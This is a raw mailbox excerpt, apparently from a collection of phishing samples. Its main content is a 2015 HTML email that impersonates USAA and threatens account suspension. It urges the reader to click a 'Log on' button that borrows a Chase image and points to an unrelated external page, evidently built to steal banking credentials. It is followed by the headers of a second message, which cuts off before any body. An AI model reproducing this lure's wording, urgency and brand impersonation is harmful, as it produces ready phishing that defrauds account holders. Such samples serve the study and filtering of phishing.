From: "USAA"<oga@shoot.com>
Subject: Alert! You have 1 new message
Date: Sat, 13 Jun 2015 05:41:59 -0300
MIME-Version: 1.0
Content-Type: text/html;
	charset="Windows-1251"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - vps13061092.123-vps.co.uk
X-AntiAbuse: Original Domain - monkey.org
X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12]
X-AntiAbuse: Sender Address Domain - shoot.com
X-Get-Message-Sender-Via: vps13061092.123-vps.co.uk: authenticated_id: contact@sustainableeventssummit.com
Status: O
X-Status: 
X-Keywords:                  
X-UID: 106

<br>
<br> 


 Dear Valued Customer:<br><br>

Your account is about to be suspended due to irregular activities on your account, Click<br>
on the Log on button below and complete the verification process to prevent your online account
 from being blocked.<br>
 <br>

 <a href="http://www.karyagmaz.net/videoflow/photos/Online.html"><img alt="Logon" src="https://chaseonline.chase.com/images/logon.gif" /></a><br>
 <br>

 Your online account will be fully restored once the verification process is completed.<br>
Thank you for being a valued customer.<br><br>


Copyright © 2015 USAA.<br>
 USAA means United Services Automobile Association and its affiliates.<br> 

From official@ail.com  Wed Jun 17 23:51:22 2015
Return-Path: <official@ail.com>
X-Original-To: jose@login.monkey.org
Delivered-To: jose@login.monkey.org
Received: from forward.b.hostedemail.com (forward.b.hostedemail.com [64.98.36.17])
	by l.monkey.org (Postfix) with ESMTP id CD391F4006
	for <jose@login.monkey.org>; Wed, 17 Jun 2015 23:51:22 -0500 (CDT)
Received: from smtpin11.hostedemail.com (10.5.19.248.rfc1918.com [10.5.19.248])
	by ofarelay01.b.hostedemail.com (Postfix) with SMTP id 6B1FE34E01A
	for <jose@login.monkey.org>; Thu, 18 Jun 2015 04:51:22 +0000 (UTC)
X-Forwarded-For: jose@monkey.org by Hostedemail
Delivered-To: jose@monkey.org
X-FDA: 70311291204.11.coal81_bf1afe80d91b
Authentication-Results: auth.b.hostedemail.com; dkim=none
	reason="no signature"; dkim-adsp=none (insecure policy);
	dkim-atps=neutral
X-Spam-Summary: 82,6.5,0,5764e622ce30590e,d41d8cd98f00b204,official@ail.com,:jose@gcinter.com,RULES_HIT:2:41:72:375:379:455:543:967:969:973:978:983:988:989:994:1026:1208:1216:1224:1254:1256:1260:1263:1313:1335:1381:1431:1432:1433:1434:1437:1516:1517:1520:1535:1571:1606:1699:1710:1730:1747:1777:1792:2107:2194:2198:2199:2200:2393:2525:2527:2549:2553:2568:2610:2631:2682:2685:2693:2741:2828:2859:2890:2892:2909:2917:2933:2937:2939:2942:2945:2947:2951:2954:3000:3022:3138:3139:3140:3141:3142:3148:3352:3866:3867:3868:3870:3872:3873:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4117:4321:4429:5007:6238:6248:6669:6678:6688:7628:7652:7903:7904:8599:8603:8957:9025:9059:9388:9908:10009:10049:10114:10241:10305:10346:11026:11257:11473:11656:11658:11914:12043:12438:12517:12519:12555:12956:12958:13019:13139:13366:14096:21080,0,RBL:neutral,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fn,MSBL:0,DNSBL:none,Custom_rules:0:1:0
X-HE-Tag: coal81_bf1afe80d91b
X-Filterd-Recvd-Size: 6625
Received: from sd.hosd.com (unknown [45.55.82.117])
	by imf02.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Thu, 18 Jun 2015 04:51:21 +0000 (UTC)
Received: from [62.108.40.18] (port=64778 helo=WIN-RE3PF93JTHN)
	by sd.hosd.com with esmtpa (Exim 4.85)
	(envelope-from <official@ail.com>)
	id 1Z5RnJ-0001gQ-RM; Thu, 18 Jun 2015 00:51:18 -0400
